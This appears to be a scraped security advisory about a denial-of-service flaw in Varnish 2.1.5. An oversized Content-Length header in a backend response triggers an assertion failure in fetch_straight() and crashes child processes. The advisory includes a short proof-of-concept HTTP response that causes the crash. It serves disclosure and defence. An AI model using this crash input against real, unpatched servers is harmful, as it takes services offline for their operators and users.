Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:29156
HistoryMar 11, 2013 - 12:00 a.m.

Varnish 2.1.5 DoS in fetch_straight() while parsing Content-Length header

2013-03-1100:00:00
vulners.com
67
JSON

###############################################

fetch_straight() | ((uintmax_t)cl == cll)

###############################################

Authors:

22733db72ab3ed94b5f8a1ffcde850251fe6f466

c8e74ebd8392fda4788179f9a02bb49337638e7b

AKAT-1

#######################################

Versions: 2.1.5

Summary

It is possible to crash (via assert) varnish child processes by sending invalid Content-Length reponse header.

  • Panic message: Assert error in fetch_straight(), cache_fetch.c line 65:#012 Condition((uintmax_t)cl == cll) not true.

POC(response):
– cut –
HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: 99999999999999999

– cut –
EOF

JSON